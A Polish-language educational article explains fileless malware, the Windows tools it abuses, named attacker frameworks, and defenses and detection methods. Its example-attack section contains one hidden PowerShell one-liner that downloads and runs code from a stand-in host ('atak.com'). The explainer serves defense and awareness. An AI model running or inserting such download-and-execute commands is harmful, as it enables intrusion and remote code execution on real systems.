🧬 Fileless Malware – Ataki bez plików i ich wykrywanie
📌 Czym jest Fileless Malware?
Fileless malware (złośliwe oprogramowanie bezplikowe) to typ ataku, który nie zapisuje złośliwego kodu jako pliku na dysku. Zamiast tego działa bezpośrednio w pamięci RAM lub wykorzystuje legalne komponenty systemu operacyjnego, takie jak PowerShell, WMI czy makra Office. To czyni go wyjątkowo trudnym do wykrycia dla tradycyjnych programów antywirusowych.
🕵️♂️ Jak działają ataki bezplikowe?
🔹 1. Wykorzystanie istniejących narzędzi
Atak rozpoczyna się przez np. otwarcie zainfekowanego dokumentu Word lub kliknięcie w złośliwy link. Następnie zainfekowana makra uruchamia PowerShell, który pobiera i wykonuje złośliwy kod w pamięci RAM.
🔹 2. Brak plików na dysku
Nie ma żadnego zapisu złośliwego oprogramowania na dysku – nie da się go „przeskanować” w klasyczny sposób.
🔹 3. Techniki LOLBins
Często wykorzystywane są natywne narzędzia Windows (LOLBins), takie jak:
powershell.exemshta.exewscript.exewmic.exe
⚠️ Przykład ataku
- Użytkownik otwiera plik Word z makrem.
- Makro uruchamia PowerShell z parametrem, który pobiera i wykonuje payload w pamięci:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://atak.com/code')"
- Złośliwy kod działa w RAM i może np. pobierać dane, otwierać backdoory, eksfiltrować pliki.

🧰 Narzędzia wykorzystywane przez cyberprzestępców
- PowerShell Empire
- Cobalt Strike
- Metasploit Framework
- Nishang
- Sharpshooter
🛡️ Jak się chronić przed Fileless Malware?
✅ 1. Używaj EDR/XDR
Tradycyjny antywirus często nie wystarcza. Endpoint Detection and Response (EDR) śledzi działania w pamięci, API i rejestrze.
✅ 2. Monitoruj nietypowe użycie PowerShell i WMI
- Blokuj
powershell.exez parametrem-EncodedCommand - Monitoruj długie polecenia PowerShell o podejrzanej strukturze
✅ 3. Dezaktywuj makra Office, szczególnie z zewnętrznych źródeł
- Włącz opcję „Blokuj makra w plikach z internetu”
- Używaj formatu PDF zamiast edytowalnych dokumentów
✅ 4. Używaj AppLocker lub Microsoft Defender Application Control
Ogranicz uruchamianie PowerShell i innych narzędzi tylko do zaufanych administratorów.
🔍 Jak wykrywać Fileless Malware?
- Sysmon + SIEM – monitorowanie procesów i zachowania
- Honeypoty w pamięci RAM
- EDR z funkcją memory scanning
- Sandboxing aktywności użytkownika
📌 Podsumowanie
Ataki bezplikowe to obecnie jeden z najbardziej zaawansowanych sposobów infekowania systemów. Ze względu na brak fizycznego pliku złośliwego, wymagają nowoczesnych narzędzi detekcji, świadomości użytkowników oraz polityki ograniczeń uruchamiania skryptów.






